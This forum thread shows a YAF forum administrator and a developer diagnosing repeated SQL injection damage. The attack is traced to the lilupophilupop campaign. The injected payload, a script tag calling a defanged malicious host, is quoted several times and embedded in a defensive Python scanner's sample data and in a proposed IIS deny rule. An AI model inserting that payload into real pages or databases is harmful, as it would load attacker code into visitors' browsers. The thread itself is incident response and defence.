
juju (YAF Lover, Topic Starter) - 13 years ago
I have been struggling with SQL script injection for weeks now. Apparently someone is able to access the forum database. I have already done almost four database restores in the past week. So far these are the precautions that I have taken:

1. removed the install directory

2. changed the database password

3. changed all validaterequest=false to true

4. changed administrator password

5. changed the YAF.ConfigPassword (before removing the install directory)

The forum is still under attack right now. I doubt there are any viruses on the server, as a number of other YAF forums are also hosted there.

Can somebody please give some more light?


hmmmm.... click thanks if my posts are useful
bbobb (YAF Developer) - 13 years ago
What version are you using?

Why did you decide that this is an SQL injection and not, let's say, an account hijack?

juju (YAF Lover, Topic Starter) - 13 years ago
Thank you for your reply.

There are just two administrators of the site. I have changed both passwords and changed all references to validaterequests=true since attack one.

Attack two came, so I completely deleted the install directory (it was just renamed previously) and changed the database password.

Attack three came, so I changed the default editor to BBCode and users will not be able to change editors, and checked that the <script> tag was not included in the accepted HTML.

Attack four came so now I am in panic mode.

The nature of the attack was that it was inserting the <script> tag into all available fields (title, username, etc...)

I am using version 1.9.5.6


hmmmm.... click thanks if my posts are useful
bbobb
  • bbobb
  • 100% (Exalted)
  • YAF Developer
13 years ago

I am using version 1.9.5.6

I can't see that version in the downloads. I should know it exactly.

But it really looks like a YAF problem.

Please tell me exactly which tables were corrupted. The problem is that you can't enter a username directly in that version at all. The only exception is the search.

juju (YAF Lover, Topic Starter) - 13 years ago
I believe 1.9.5.6 was release candidate 1 prior to 1.9.6. It was posted under the SVN trunk.

The attack came with the same behaviour as in this post:

http://forum.yetanotherforum.net/yaf_postst12938_Has-my-forum-is-been-hacked.aspx 

I am unable to tell you the full list right now because I have just restored it (maybe if it attacks again? My God, I hope not), but I am sure it is in the following tables:

forum_prov_Membership - UserID

forum_Topic - Topic

forum_Topic - TopicImage

The forum_User Email field was also wiped out, as I recall.

bbobb (YAF Developer) - 13 years ago

Originally Posted by: juju
    forum_Topic - TopicImage

This field is not used in the YAF code at all and can't be filled at all from the web interface.

All I can say is that the attacker knows your database structure. You should write a trap; the problem is that it's almost impossible, even in theory, to make an injection, as YAF uses parameters and SPs everywhere in that version.

Switch off YAF search and use an external search only for some time. But I still think that the problem is that someone has gotten access to the Run SQL admin area.

juju (YAF Lover, Topic Starter) - 13 years ago
Turning off search is the only thing I did not do. I will do this immediately.

And yes, I assume the attacker would research something about the YAF DB structure prior to the attack (since YAF is available for everyone to download). I shudder to think that he/she is among us at this very forum reading this very thread 😨

What I can do now, maybe, is to back up every couple of hours. I will post my results here. You've been a great help, bbobb, even for just taking the time to investigate.

juju (YAF Lover, Topic Starter) - 13 years ago
I am back and I got hit again. This time I have exported the infected database to a script. Apparently I am not the only one getting hit by this. I have confirmed it is indeed an SQL injection attack:

http://isc.sans.edu/diary.html?storyid=12127 

It seems to be injecting the following text and even wiping out whole fields:

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

It is not localized to YAF but affects users of MS SQL, Microsoft IIS, ASP sites and ColdFusion (https://www.mywot.com/en/forum/18320-watch-out-for-lilupophilupop-com-sql-injection-exploit)

I hope we can get a first line of defense on this. If anybody is interested, I could PM the generated database script to build in a controlled environment for examination. I dare not build this on my dev PC.

MJCS (YAF Lover) - 13 years ago
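bbobb asked exactly which tables were corrupted, and the post above describes the injected marker. The following is an added example (not code from the thread or from YAF) that scans a SQL Server-style INSERT export for cells carrying that marker and reports the affected table and column; the export lines are constructed for the example, and the URL is kept defanged as in the post.

```python
import re

# Markers taken from the injected text quoted in this thread. A real scan would
# also match the live "http://" form; the sample below uses the defanged "hXXp".
INJECTION_MARKERS = ("</title><script", "<script src=", "lilupophilupop.com")

# One INSERT per line, as produced by SQL Server "Generate Scripts" exports.
_INSERT_RE = re.compile(
    r"INSERT\s+(?:INTO\s+)?(?P<table>[\w\[\].]+)\s*\((?P<cols>[^)]*)\)"
    r"\s*VALUES\s*\((?P<vals>.*)\)\s*;?\s*$", re.IGNORECASE)
# Split the VALUES list on commas outside quotes; T-SQL escapes quotes as ''.
_VALUE_RE = re.compile(r"\s*(N?'(?:[^']|'')*'|[^,]+)")

def _clean_ident(name: str) -> str:
    # "[dbo].[forum_Topic]" -> "forum_Topic"
    return re.sub(r"[\[\]]", "", name.strip()).split(".")[-1]

def _unquote(value: str) -> str:
    value = value.strip()
    if value.startswith("N'"):
        value = value[1:]
    if value.startswith("'") and value.endswith("'"):
        return value[1:-1].replace("''", "'")
    return value          # NULL, numbers, etc. stay as written

def find_injected_cells(script: str, markers=INJECTION_MARKERS):
    """Return (table, column, value_prefix) for every cell containing a marker."""
    hits = []
    for line in script.splitlines():
        m = _INSERT_RE.match(line.strip())
        if not m:
            continue
        table = _clean_ident(m.group("table"))
        cols = [_clean_ident(c) for c in m.group("cols").split(",")]
        vals = [_unquote(v) for v in _VALUE_RE.findall(m.group("vals"))]
        for col, val in zip(cols, vals):
            if any(mk.lower() in val.lower() for mk in markers):
                hits.append((table, col, val[:60]))
    return hits

def affected_columns(hits):
    """Distinct 'table.column' names, the list bbobb asked for."""
    return sorted({f"{t}.{c}" for t, c, _ in hits})

# Constructed sample export: one clean topic, one injected topic, one user row.
SAMPLE_EXPORT = """\
INSERT [dbo].[forum_Topic] ([TopicID], [Topic], [TopicImage]) VALUES (1, N'Welcome to the board', NULL)
INSERT [dbo].[forum_Topic] ([TopicID], [Topic], [TopicImage]) VALUES (2, N'Help"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>', N'"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>')
INSERT [dbo].[forum_User] ([UserID], [Name], [Email]) VALUES (7, N'juju', N'')
"""

if __name__ == "__main__":
    for hit in find_injected_cells(SAMPLE_EXPORT):
        print(hit)
```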
I think there is an option in IIS to disable cross-site scripts so all script sources have to belong to the same domain. I've seen this kind of scripting injection done in phpBB and other forums.

UPDATE

In IIS go to Request Filtering. You can deny or allow whatever you like there.

juju (YAF Lover, Topic Starter) - 13 years ago

Originally Posted by: MJCS
    I think there is an option in IIS to disable cross-site scripts so all script sources have to belong to the same domain. I've seen this kind of scripting injection done in phpBB and other forums.

    UPDATE

    In IIS go to Request Filtering. You can deny or allow whatever you like there.

Not much of an IIS gal (please be patient), but if I add

"></title><script src="hXXp://lilupophilupop.com/sl.php"></script>

to the deny query string under request filtering, should it prevent the injection of the exact string into the fields? (Or am I doing it wrong?)

I was assuming the attack was using something like the one mentioned in this article:

http://blog.strictly-software.com/2009/10/two-stage-sql-injection-attack.html
- where what is being inserted into the web form post fields are the actual SQL commands, encoded to deliver the payload.

In any case I will try as you say. Would you mind telling me the correct way to do it? Under request filtering I see File Extensions, Rules, Hidden Segments, URL, HTTP Verbs and Query Strings. Do I make an entry in all of them?

MJCS (YAF Lover) - 13 years ago
Well it depends. You can block